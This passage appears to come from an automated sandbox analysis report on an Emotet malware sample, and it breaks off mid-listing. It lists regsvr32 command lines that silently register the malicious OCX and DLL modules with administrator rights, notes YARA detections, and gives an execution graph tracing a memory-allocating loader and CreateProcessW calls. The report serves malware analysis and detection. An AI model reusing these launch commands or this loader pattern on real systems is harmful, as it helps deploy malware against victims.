                                                    Target ID:7
                                                    Start time:09:18:38
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.953780664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    General

                                                    Target ID:8
                                                    Start time:09:18:41
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll"
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1241141714.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    General

                                                    Target ID:9
                                                    Start time:09:18:44
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:6.7%
                                                      Dynamic/Decrypted Code Coverage:2.5%
                                                      Signature Coverage:10%
                                                      Total number of Nodes:1905
                                                      Total number of Limit Nodes:30
                                                      execution_graph 16644 7fef9d30215 16645 7fef9d30231 16644->16645 16649 7fef9d30302 16644->16649 16715 7fef9d38c80 16645->16715 16647 7fef9d30489 16735 7fef9d32d80 16647->16735 16652 7fef9d3040d 16649->16652 16722 7fef9d38c30 16649->16722 16650 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16653 7fef9d3027e OutputDebugStringW 16650->16653 16652->16647 16655 7fef9d31640 17 API calls 16652->16655 16656 7fef9d30296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 16653->16656 16654 7fef9d304a3 16657 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16654->16657 16660 7fef9d3045c 16655->16660 16668 7fef9d302f2 16656->16668 16658 7fef9d304d0 16657->16658 16663 7fef9d3053d 16658->16663 16664 7fef9d32d80 17 API calls 16658->16664 16670 7fef9d30583 16658->16670 16662 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16660->16662 16662->16647 16665 7fef9d32d80 17 API calls 16663->16665 16666 7fef9d30510 16664->16666 16667 7fef9d30556 16665->16667 16672 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16666->16672 16673 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16667->16673 16674 7fef9d23280 __GSHandlerCheck 8 API calls 16668->16674 16669 7fef9d30357 16671 7fef9d303af 16669->16671 16675 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16669->16675 16748 7fef9d31590 16670->16748 16671->16652 16725 7fef9d31640 16671->16725 16672->16663 16673->16670 16677 7fef9d30cae 16674->16677 16675->16671 16679 7fef9d303e0 16680 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16679->16680 16680->16652 16681 7fef9d305fa 16682 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16681->16682 16683 7fef9d30652 16681->16683 16682->16683 16684 7fef9d31640 17 API calls 16683->16684 16686 7fef9d306b0 16683->16686 16685 7fef9d30683 16684->16685 16687 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16685->16687 16688 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16686->16688 16687->16686 16689 7fef9d30769 16688->16689 16690 7fef9d2d490 std::exception::_Copy_str 17 API calls 16689->16690 16705 7fef9d307bd 16689->16705 16691 7fef9d30790 16690->16691 16692 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16691->16692 16692->16705 16693 7fef9d30905 16693->16668 16694 7fef9d30a26 16693->16694 16695 7fef9d309a4 GetFileType 16693->16695 16696 7fef9d30ba5 16694->16696 16697 7fef9d30b97 OutputDebugStringW 16694->16697 16699 7fef9d309d0 16695->16699 16703 7fef9d309ce 16695->16703 16696->16668 16700 7fef9d30c23 16696->16700 16701 7fef9d38c80 _itow_s 17 API calls 16696->16701 16697->16696 16702 7fef9d309dd WriteConsoleW 16699->16702 16752 7fef9d2b470 16700->16752 16704 7fef9d30bf6 16701->16704 16702->16694 16706 7fef9d30a2b GetLastError 16702->16706 16707 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16703->16707 16708 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16704->16708 16705->16693 16751 7fef9d29360 LeaveCriticalSection 16705->16751 16706->16694 16706->16703 16710 7fef9d30ab5 16707->16710 16708->16700 16711 7fef9d30b26 WriteFile 16710->16711 16712 7fef9d30ad0 16710->16712 16711->16694 16714 7fef9d30add WriteFile 16712->16714 16714->16694 16716 7fef9d38cd3 16715->16716 16717 7fef9d38ca6 16715->16717 16718 7fef9d38d00 _itow_s 17 API calls 16716->16718 16717->16716 16719 7fef9d38cad 16717->16719 16720 7fef9d30251 16718->16720 16778 7fef9d38d00 16719->16778 16720->16650 16794 7fef9d386b0 16722->16794 16724 7fef9d38c74 16724->16669 16726 7fef9d31661 16725->16726 16727 7fef9d316c2 16726->16727 16729 7fef9d31700 _calloc_dbg_impl 16726->16729 16728 7fef9d2bd70 _invalid_parameter 17 API calls 16727->16728 16731 7fef9d316f6 _calloc_dbg_impl 16728->16731 16730 7fef9d317f4 16729->16730 16733 7fef9d31832 _calloc_dbg_impl 16729->16733 16732 7fef9d2bd70 _invalid_parameter 17 API calls 16730->16732 16731->16679 16732->16731 16733->16731 16734 7fef9d2bd70 _invalid_parameter 17 API calls 16733->16734 16734->16731 16736 7fef9d32da1 16735->16736 16737 7fef9d32e02 16736->16737 16739 7fef9d32e40 _calloc_dbg_impl 16736->16739 16738 7fef9d2bd70 _invalid_parameter 17 API calls 16737->16738 16744 7fef9d32e36 _calloc_dbg_impl 16738->16744 16740 7fef9d32f34 16739->16740 16741 7fef9d32f72 _calloc_dbg_impl 16739->16741 16742 7fef9d2bd70 _invalid_parameter 17 API calls 16740->16742 16743 7fef9d330b5 16741->16743 16745 7fef9d330f3 _calloc_dbg_impl 16741->16745 16742->16744 16746 7fef9d2bd70 _invalid_parameter 17 API calls 16743->16746 16744->16654 16745->16744 16747 7fef9d2bd70 _invalid_parameter 17 API calls 16745->16747 16746->16744 16747->16744 16749 7fef9d386b0 _snwprintf_s 17 API calls 16748->16749 16750 7fef9d315de 16749->16750 16750->16681 16751->16693 16753 7fef9d2b48d 16752->16753 16754 7fef9d2b4ce GetModuleFileNameW 16753->16754 16755 7fef9d2b4c4 16753->16755 16756 7fef9d2b4f2 16754->16756 16762 7fef9d2b538 16754->16762 16758 7fef9d23280 __GSHandlerCheck 8 API calls 16755->16758 16757 7fef9d31640 17 API calls 16756->16757 16759 7fef9d2b50b 16757->16759 16760 7fef9d2ba58 16758->16760 16761 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16759->16761 16760->16668 16761->16762 16764 7fef9d2b5f2 16762->16764 16816 7fef9d30fd0 16762->16816 16767 7fef9d31590 _snwprintf_s 17 API calls 16764->16767 16765 7fef9d2b5c5 16766 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16765->16766 16766->16764 16768 7fef9d2b940 16767->16768 16769 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16768->16769 16770 7fef9d2b998 16768->16770 16769->16770 16771 7fef9d31640 17 API calls 16770->16771 16773 7fef9d2b9f6 16770->16773 16772 7fef9d2b9c9 16771->16772 16774 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16772->16774 16773->16755 16826 7fef9d2cff0 16773->16826 16774->16773 16779 7fef9d38d25 16778->16779 16780 7fef9d38d7b 16779->16780 16782 7fef9d38db9 16779->16782 16781 7fef9d2bd70 _invalid_parameter 17 API calls 16780->16781 16791 7fef9d38daf 16781->16791 16783 7fef9d38e1a 16782->16783 16785 7fef9d38e58 _calloc_dbg_impl 16782->16785 16784 7fef9d2bd70 _invalid_parameter 17 API calls 16783->16784 16784->16791 16786 7fef9d38f5d 16785->16786 16788 7fef9d38f9b 16785->16788 16787 7fef9d2bd70 _invalid_parameter 17 API calls 16786->16787 16787->16791 16789 7fef9d3900e 16788->16789 16792 7fef9d3904c 16788->16792 16790 7fef9d2bd70 _invalid_parameter 17 API calls 16789->16790 16790->16791 16791->16720 16792->16791 16793 7fef9d2bd70 _invalid_parameter 17 API calls 16792->16793 16793->16791 16795 7fef9d386e6 16794->16795 16796 7fef9d3873c 16795->16796 16800 7fef9d3877a 16795->16800 16797 7fef9d2bd70 _invalid_parameter 17 API calls 16796->16797 16806 7fef9d38770 _calloc_dbg_impl 16797->16806 16798 7fef9d3880e 16803 7fef9d2bd70 _invalid_parameter 17 API calls 16798->16803 16799 7fef9d3884c 16801 7fef9d38992 16799->16801 16802 7fef9d38862 16799->16802 16800->16798 16800->16799 16800->16806 16804 7fef9d38350 _snwprintf_s 17 API calls 16801->16804 16809 7fef9d38350 16802->16809 16803->16806 16807 7fef9d388b1 _calloc_dbg_impl 16804->16807 16806->16724 16807->16806 16808 7fef9d2bd70 _invalid_parameter 17 API calls 16807->16808 16808->16806 16810 7fef9d3839b 16809->16810 16811 7fef9d383f1 16810->16811 16814 7fef9d3842f 16810->16814 16812 7fef9d2bd70 _invalid_parameter 17 API calls 16811->16812 16813 7fef9d38425 16812->16813 16813->16807 16814->16813 16815 7fef9d2bd70 _invalid_parameter 17 API calls 16814->16815 16815->16813 16817 7fef9d30ff7 16816->16817 16819 7fef9d30ff0 __SehTransFilter 16816->16819 16818 7fef9d31055 16817->16818 16821 7fef9d31093 _calloc_dbg_impl 16817->16821 16820 7fef9d2bd70 _invalid_parameter 17 API calls 16818->16820 16819->16765 16820->16819 16821->16819 16822 7fef9d3111a 16821->16822 16824 7fef9d31158 16821->16824 16823 7fef9d2bd70 _invalid_parameter 17 API calls 16822->16823 16823->16819 16824->16819 16825 7fef9d2bd70 _invalid_parameter 17 API calls 16824->16825 16825->16819 16828 7fef9d2d02a 16826->16828 16827 7fef9d2d1d8 DecodePointer 16829 7fef9d2d1e8 16827->16829 16828->16827 16830 7fef9d2bd70 _invalid_parameter 17 API calls 16828->16830 16832 7fef9d27090 _exit 33 API calls 16829->16832 16833 7fef9d2d209 16829->16833 16837 7fef9d2ba2b 16829->16837 16831 7fef9d2d1ce 16830->16831 16831->16827 16831->16837 16832->16833 16835 7fef9d2d289 16833->16835 16841 7fef9d23d00 RtlEncodePointer 16833->16841 16835->16837 16842 7fef9d29360 LeaveCriticalSection 16835->16842 16838 7fef9d27090 16837->16838 16839 7fef9d27280 _exit 33 API calls 16838->16839 16840 7fef9d270a9 16839->16840 16840->16755 16841->16835 16842->16837 16843 7fef9d2ae14 16844 7fef9d2b390 16843->16844 16845 7fef9d23280 __GSHandlerCheck 8 API calls 16844->16845 16846 7fef9d2b3a0 16845->16846 17884 7fef9d32c10 17885 7fef9d32c53 17884->17885 17886 7fef9d32c24 _updatetlocinfoEx_nolock 17884->17886 17888 7fef9d29360 LeaveCriticalSection 17886->17888 17888->17885 17889 7fef9d3d410 17894 7fef9d3d3e0 17889->17894 17892 7fef9d3d43c 17893 7fef9d3d710 _Ref_count LeaveCriticalSection 17893->17892 17897 7fef9d40070 17894->17897 17900 7fef9d40083 _free_nolock 17897->17900 17899 7fef9d3d402 17899->17892 17899->17893 17901 7fef9d29360 LeaveCriticalSection 17900->17901 17901->17899 18443 180024ee6 18444 180024eea 18443->18444 18446 180024f52 18443->18446 18445 18002506a CreateProcessW 18446->18445 17902 7fef9d27816 17903 7fef9d27826 _calloc_dbg 17902->17903 17906 7fef9d27a32 InitializeCriticalSectionAndSpinCount 17903->17906 17907 7fef9d27a19 GetFileType 17903->17907 17908 7fef9d27ab9 17903->17908 17904 7fef9d27ce0 SetHandleCount 17905 7fef9d27aaf 17904->17905 17906->17905 17906->17908 17907->17906 17907->17908 17908->17904 17909 7fef9d27b95 GetStdHandle 17908->17909 17910 7fef9d27c7b 17908->17910 17909->17910 17911 7fef9d27bb9 17909->17911 17910->17904 17911->17910 17912 7fef9d27bc8 GetFileType 17911->17912 17912->17910 17913 7fef9d27beb InitializeCriticalSectionAndSpinCount 17912->17913 17913->17905 17913->17910 16467 7fef9d2461b 16470 7fef9d24625 _calloc_dbg_impl 16467->16470 16469 7fef9d248be 16471 7fef9d29360 LeaveCriticalSection 16470->16471 16471->16469 16853 7fef9d36203 16854 7fef9d3616e _CrtMemDumpAllObjectsSince wcsxfrm 16853->16854 16855 7fef9d36238 MultiByteToWideChar 16854->16855 16856 7fef9d361c8 _LocaleUpdate::~_LocaleUpdate 16854->16856 16855->16856 16595 1800178f4 16598 18000ffc0 16595->16598 16597 180017924 16602 18001000e 16598->16602 16599 180011bd0 16610 1800053b0 16599->16610 16602->16599 16603 1800116b2 16602->16603 16604 18001667c 16602->16604 16603->16597 16605 1800166ac 16604->16605 16608 180016ad3 16605->16608 16614 180023624 16605->16614 16618 18000bc98 16605->16618 16622 1800270c0 16605->16622 16608->16602 16612 1800053e0 16610->16612 16611 18001a10c CreateProcessW 16613 18000598b 16611->16613 16612->16611 16612->16613 16613->16603 16617 180023662 16614->16617 16616 1800237ae 16616->16605 16617->16616 16626 18001a10c 16617->16626 16621 18000bcde 16618->16621 16619 18001a10c CreateProcessW 16620 18000c521 16619->16620 16620->16605 16621->16619 16621->16620 16625 180027157 16622->16625 16623 180027fe1 16623->16605 16624 18001a10c CreateProcessW 16624->16625 16625->16623 16625->16624 16627 18001a166 16626->16627 16628 180024f28 CreateProcessW 16627->16628 16629 18001a335 16628->16629 16629->16616 16857 7fef9d40204 16860 7fef9d4023d 16857->16860 16859 7fef9d403d7 16860->16859 16861 7fef9d40326 16860->16861 16863 7fef9d3ab10 16860->16863 16861->16859 16867 7fef9d39290 16861->16867 16864 7fef9d3ab23 16863->16864 16865 7fef9d3ab35 16863->16865 16864->16861 16865->16864 16866 7fef9d2bd70 _invalid_parameter 17 API calls 16865->16866 16866->16864 16868 7fef9d392d8 16867->16868 16875 7fef9d392b6 __doserrno 16867->16875 16869 7fef9d39341 __doserrno 16868->16869 16874 7fef9d3938c 16868->16874 16872 7fef9d2bd70 _invalid_parameter 17 API calls 16869->16872 16870 7fef9d3945b 16881 7fef9d3fae0 16870->16881 16872->16875 16874->16870 16876 7fef9d39410 __doserrno 16874->16876 16875->16859 16878 7fef9d2bd70 _invalid_parameter 17 API calls 16876->16878 16878->16875 16879 7fef9d394a6 __doserrno 16895 7fef9d3fbc0 LeaveCriticalSection 16879->16895 16882 7fef9d3fb25 16881->16882 16883 7fef9d3fb7a 16881->16883 16886 7fef9d3fb56 16882->16886 16887 7fef9d3fb3b InitializeCriticalSectionAndSpinCount 16882->16887 16884 7fef9d39464 16883->16884 16885 7fef9d3fb81 EnterCriticalSection 16883->16885 16884->16879 16889 7fef9d39520 16884->16889 16885->16884 16896 7fef9d29360 LeaveCriticalSection 16886->16896 16887->16886 16897 7fef9d3f900 16889->16897 16891 7fef9d39545 16892 7fef9d3959d SetFilePointer 16891->16892 16894 7fef9d39552 _dosmaperr 16891->16894 16893 7fef9d395c1 GetLastError 16892->16893 16892->16894 16893->16894 16894->16879 16895->16875 16896->16883 16898 7fef9d3f935 16897->16898 16900 7fef9d3f913 __doserrno 16897->16900 16899 7fef9d3f99e __doserrno 16898->16899 16902 7fef9d3f9e9 __doserrno 16898->16902 16901 7fef9d2bd70 _invalid_parameter 17 API calls 16899->16901 16900->16891 16901->16900 16902->16900 16903 7fef9d2bd70 _invalid_parameter 17 API calls 16902->16903 16903->16900 16630 140000 16631 140183 16630->16631 16632 14043e VirtualAlloc 16631->16632 16635 140462 16632->16635 16633 140531 GetNativeSystemInfo 16634 14056d VirtualAlloc 16633->16634 16636 140a00 16633->16636 16638 14058b 16634->16638 16635->16633 16635->16636 16637 1409d9 VirtualProtect 16637->16638 16638->16636 16638->16637 16904 7fef9d41200 16907 7fef9d2ed30 16904->16907 16906 7fef9d41212 _IsExceptionObjectToBeDestroyed __SehTransFilter 16908 7fef9d2ed3e 16907->16908 16910 7fef9d2ed4c 16908->16910 16913 7fef9d2cf80 DecodePointer 16908->16913 16911 7fef9d2cf80 _inconsistency 36 API calls 16910->16911 16912 7fef9d2ed88 16910->16912 16911->16912 16912->16906 16914 7fef9d2cf9e 16913->16914 16917 7fef9d2cf50 16914->16917 16919 7fef9d2cf59 16917->16919 16921 7fef9d339e0 16919->16921 16922 7fef9d339fa 16921->16922 16931 7fef9d2d430 DecodePointer 16922->16931 16924 7fef9d33a09 16925 7fef9d33a20 16924->16925 16926 7fef9d2cff0 terminate 34 API calls 16924->16926 16927 7fef9d33a42 16925->16927 16928 7fef9d2be50 terminate 14 API calls 16925->16928 16926->16925 16929 7fef9d27090 _exit 33 API calls 16927->16929 16928->16927 16930 7fef9d2cf78 16929->16930 16930->16910 16931->16924 17428 7fef9d23909 17429 7fef9d23913 __SehTransFilter 17428->17429 17430 7fef9d239db __SehTransFilter 17429->17430 17431 7fef9d23a71 RtlUnwindEx 17429->17431 17431->17430 17920 7fef9d23409 17921 7fef9d23e00 3 API calls 17920->17921 17922 7fef9d2340e 17921->17922 17925 7fef9d288d0 HeapDestroy 17922->17925 17924 7fef9d23413 17925->17924 18488 7fef9d3c30d 18489 7fef9d3c31a get_int64_arg _get_printf_count_output 18488->18489 18490 7fef9d3c39d 18489->18490 18491 7fef9d3c3f2 18489->18491 18493 7fef9d2bd70 _invalid_parameter 17 API calls 18490->18493 18494 7fef9d3b99c 18491->18494 18499 7fef9d3b530 wctomb_s 19 API calls 18491->18499 18492 7fef9d3cc93 18495 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18492->18495 18498 7fef9d2bd70 _invalid_parameter 17 API calls 18492->18498 18493->18495 18494->18492 18500 7fef9d3bada 18494->18500 18496 7fef9d23280 __GSHandlerCheck 8 API calls 18495->18496 18497 7fef9d3cd90 18496->18497 18498->18495 18499->18491 18501 7fef9d2bd70 _invalid_parameter 17 API calls 18500->18501 18501->18495 16384 7fef9d23d30 16402 7fef9d27540 16384->16402 16389 7fef9d23d4e FlsAlloc 16392 7fef9d23d73 _calloc_dbg 16389->16392 16393 7fef9d23d6a 16389->16393 16390 7fef9d23d42 16391 7fef9d23e00 3 API calls 16390->16391 16399 7fef9d23d47 16391->16399 16395 7fef9d23da4 FlsSetValue 16392->16395 16396 7fef9d23db9 16392->16396 16394 7fef9d23e00 3 API calls 16393->16394 16394->16399 16395->16396 16397 7fef9d23dc2 16395->16397 16398 7fef9d23e00 3 API calls 16396->16398 16411 7fef9d23e30 16397->16411 16398->16399 16417 7fef9d23d00 RtlEncodePointer 16402->16417 16404 7fef9d27549 _initp_misc_winsig 16418 7fef9d2cf20 EncodePointer 16404->16418 16406 7fef9d23d39 16407 7fef9d28fe0 16406->16407 16408 7fef9d28ff6 16407->16408 16409 7fef9d23d3e 16408->16409 16410 7fef9d29022 InitializeCriticalSectionAndSpinCount 16408->16410 16409->16389 16409->16390 16410->16408 16410->16409 16412 7fef9d23ead 16411->16412 16419 7fef9d29360 LeaveCriticalSection 16412->16419 16414 7fef9d23ec7 _updatetlocinfoEx_nolock 16420 7fef9d29360 LeaveCriticalSection 16414->16420 16416 7fef9d23dce GetCurrentThreadId 16416->16399 16417->16404 16418->16406 16419->16414 16420->16416 17432 7fef9d23130 17433 7fef9d23170 __GSHandlerCheck 8 API calls 17432->17433 17434 7fef9d23160 17433->17434 17926 7fef9d2e830 17927 7fef9d2e857 17926->17927 17928 7fef9d33cc0 __SehTransFilter 39 API calls 17927->17928 17929 7fef9d2e8e3 17928->17929 17930 7fef9d3c435 17931 7fef9d3c479 _CrtMemDumpAllObjectsSince 17930->17931 17932 7fef9d3c598 DecodePointer 17931->17932 17933 7fef9d3c60d _CrtMemDumpAllObjectsSince 17932->17933 17934 7fef9d3c62b DecodePointer 17933->17934 17935 7fef9d3c652 _CrtMemDumpAllObjectsSince 17933->17935 17934->17935 17936 7fef9d3c676 DecodePointer 17935->17936 17946 7fef9d3c69d std::exception::_Copy_str 17935->17946 17936->17946 17937 7fef9d3b99c 17938 7fef9d3cc93 17937->17938 17943 7fef9d3bada 17937->17943 17939 7fef9d2bd70 _invalid_parameter 17 API calls 17938->17939 17941 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17938->17941 17939->17941 17940 7fef9d3b530 wctomb_s 19 API calls 17940->17946 17942 7fef9d23280 __GSHandlerCheck 8 API calls 17941->17942 17944 7fef9d3cd90 17942->17944 17945 7fef9d2bd70 _invalid_parameter 17 API calls 17943->17945 17945->17941 17946->17937 17946->17940 16430 7fef9d23433 16431 7fef9d23437 16430->16431 16435 7fef9d23446 16430->16435 16432 7fef9d27d00 _ioterm DeleteCriticalSection 16431->16432 16433 7fef9d2343c 16432->16433 16434 7fef9d23e00 3 API calls 16433->16434 16436 7fef9d23441 16434->16436 16438 7fef9d288d0 HeapDestroy 16436->16438 16438->16435 17947 7fef9d3d830 17948 7fef9d3d8aa 17947->17948 17949 7fef9d3d926 17948->17949 17950 7fef9d3d97b 17948->17950 17951 7fef9d2bd70 _invalid_parameter 17 API calls 17949->17951 17952 7fef9d3d9ee 17950->17952 17959 7fef9d3da43 17950->17959 17955 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17951->17955 17953 7fef9d2bd70 _invalid_parameter 17 API calls 17952->17953 17953->17955 17954 7fef9d23280 __GSHandlerCheck 8 API calls 17956 7fef9d3ed9e 17954->17956 17955->17954 17957 7fef9d3eca1 17957->17955 17958 7fef9d2bd70 _invalid_parameter 17 API calls 17957->17958 17958->17955 17959->17957 17960 7fef9d3dbb5 17959->17960 17961 7fef9d2bd70 _invalid_parameter 17 API calls 17960->17961 17961->17955 17962 7fef9d26c32 17963 7fef9d26c3c 17962->17963 17964 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17963->17964 17966 7fef9d26c7a _CrtMemDumpAllObjectsSince 17963->17966 17965 7fef9d23280 __GSHandlerCheck 8 API calls 17964->17965 17967 7fef9d26e89 17965->17967 17968 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17966->17968 17969 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17966->17969 17968->17969 17970 7fef9d2c0c0 _swprintf_p 17 API calls 17969->17970 17972 7fef9d26dc7 17970->17972 17971 7fef9d26e12 17972->17971 17973 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17972->17973 17973->17971 16941 7fef9d33e3b 16942 7fef9d33ec7 16941->16942 16945 7fef9d2e790 16942->16945 16952 7fef9d2e500 16945->16952 16949 7fef9d2e7d0 __SehTransFilter 16960 7fef9d34f20 16949->16960 16951 7fef9d2e81e 16953 7fef9d33b40 __StateFromControlPc 36 API calls 16952->16953 16955 7fef9d2e539 16953->16955 16954 7fef9d2e601 16957 7fef9d33b40 16954->16957 16955->16954 16956 7fef9d2e5c2 RtlLookupFunctionEntry 16955->16956 16956->16954 16967 7fef9d33a60 16957->16967 16973 7fef9d33b70 16960->16973 16962 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 16963 7fef9d2cf80 _inconsistency 36 API calls 16962->16963 16964 7fef9d35103 16962->16964 16963->16962 16965 7fef9d3514a __SetState 16964->16965 16966 7fef9d2cf80 _inconsistency 36 API calls 16964->16966 16965->16951 16966->16965 16968 7fef9d33a7b 16967->16968 16969 7fef9d33a7d 16967->16969 16971 7fef9d2cf80 _inconsistency 36 API calls 16968->16971 16972 7fef9d33aa5 16968->16972 16970 7fef9d2cf80 _inconsistency 36 API calls 16969->16970 16970->16968 16971->16972 16972->16949 16974 7fef9d33b9a 16973->16974 16976 7fef9d33ba9 16973->16976 16975 7fef9d33b40 __StateFromControlPc 36 API calls 16974->16975 16975->16976 16976->16962 16460 18001a10c 16461 18001a166 16460->16461 16464 180024f28 16461->16464 16463 18001a335 16466 180024fcb 16464->16466 16465 18002506a CreateProcessW 16465->16463 16466->16465 17974 7fef9d2443c 17975 7fef9d2444c 17974->17975 17978 7fef9d29360 LeaveCriticalSection 17975->17978 17977 7fef9d248be 17978->17977 17455 7fef9d39939 17456 7fef9d39951 __doserrno 17455->17456 17457 7fef9d2bd70 _invalid_parameter 17 API calls 17456->17457 17458 7fef9d399d7 17457->17458 17459 7fef9d23280 __GSHandlerCheck 8 API calls 17458->17459 17460 7fef9d3a9f5 17459->17460 17979 7fef9d3e424 17980 7fef9d3e469 _CrtMemDumpAllObjectsSince 17979->17980 17981 7fef9d3e588 DecodePointer 17980->17981 17982 7fef9d3e5fd _CrtMemDumpAllObjectsSince 17981->17982 17983 7fef9d3e642 _CrtMemDumpAllObjectsSince 17982->17983 17984 7fef9d3e61b DecodePointer 17982->17984 17985 7fef9d3e666 DecodePointer 17983->17985 17987 7fef9d3e68d std::exception::_Copy_str 17983->17987 17984->17983 17985->17987 17986 7fef9d3eadf 17989 7fef9d3ef10 25 API calls 17986->17989 17987->17986 17988 7fef9d3eec0 25 API calls 17987->17988 17996 7fef9d3da75 17987->17996 17988->17986 17990 7fef9d3eafd 17989->17990 17991 7fef9d3eb33 17990->17991 17995 7fef9d3eec0 25 API calls 17990->17995 17992 7fef9d3ec29 17991->17992 18006 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17991->18006 17993 7fef9d3ebda 17992->17993 17994 7fef9d3ef10 25 API calls 17992->17994 17993->17996 17999 7fef9d3eec0 25 API calls 17993->17999 17994->17993 17995->17991 17997 7fef9d3eca1 17996->17997 18002 7fef9d3dbb5 17996->18002 17998 7fef9d2bd70 _invalid_parameter 17 API calls 17997->17998 18000 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17997->18000 17998->18000 17999->17996 18001 7fef9d23280 __GSHandlerCheck 8 API calls 18000->18001 18003 7fef9d3ed9e 18001->18003 18005 7fef9d2bd70 _invalid_parameter 17 API calls 18002->18005 18004 7fef9d3f000 wcsxfrm 2 API calls 18004->18006 18005->18000 18006->17993 18006->18004 18007 7fef9d3ee40 25 API calls 18006->18007 18007->18006 16977 7fef9d25a25 16978 7fef9d25a37 16977->16978 16979 7fef9d2bd70 _invalid_parameter 17 API calls 16978->16979 16980 7fef9d25aaf 16979->16980 17461 7fef9d34920 17464 7fef9d3d530 17461->17464 17467 7fef9d3d580 17464->17467 17468 7fef9d3493d 17467->17468 17469 7fef9d3d59a std::exception::_Tidy 17467->17469 17469->17468 17471 7fef9d3d660 17469->17471 17472 7fef9d3d676 std::exception::_Copy_str malloc 17471->17472 17474 7fef9d3d6bf 17471->17474 17473 7fef9d2d490 std::exception::_Copy_str 17 API calls 17472->17473 17472->17474 17473->17474 17474->17468 18510 7fef9d29328 18511 7fef9d29336 EnterCriticalSection 18510->18511 18512 7fef9d2932c 18510->18512 18512->18511 18513 7fef9d3ff2d 18514 7fef9d3ff37 18513->18514 18515 7fef9d40042 18514->18515 18516 7fef9d3ff47 18514->18516 18528 7fef9d29360 LeaveCriticalSection 18515->18528 18517 7fef9d4003d 18516->18517 18520 7fef9d3ae90 _lock_file2 EnterCriticalSection 18516->18520 18519 7fef9d4004c 18521 7fef9d3ff97 18520->18521 18522 7fef9d3ffd0 18521->18522 18524 7fef9d3ffe1 18521->18524 18525 7fef9d3ffbb 18521->18525 18523 7fef9d3af60 _unlock_file2 2 API calls 18522->18523 18523->18517 18524->18522 18527 7fef9d3fd70 _fflush_nolock 25 API calls 18524->18527 18526 7fef9d3fd70 _fflush_nolock 25 API calls 18525->18526 18526->18522 18527->18522 18528->18519 17479 7fef9d2b12b 17480 7fef9d2b14c 17479->17480 17481 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17480->17481 17483 7fef9d2b2e0 17480->17483 17481->17483 17482 7fef9d2b33e 17495 7fef9d30cc0 17482->17495 17483->17482 17484 7fef9d2d490 std::exception::_Copy_str 17 API calls 17483->17484 17486 7fef9d2b311 17484->17486 17488 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17486->17488 17488->17482 17489 7fef9d2b37d 17492 7fef9d23280 __GSHandlerCheck 8 API calls 17489->17492 17490 7fef9d2cff0 terminate 34 API calls 17491 7fef9d2b373 17490->17491 17493 7fef9d27090 _exit 33 API calls 17491->17493 17494 7fef9d2b3a0 17492->17494 17493->17489 17513 7fef9d23d00 RtlEncodePointer 17495->17513 17497 7fef9d30cf6 17498 7fef9d30d23 LoadLibraryW 17497->17498 17499 7fef9d30e15 17497->17499 17501 7fef9d30d44 GetProcAddress 17498->17501 17511 7fef9d30d3d 17498->17511 17500 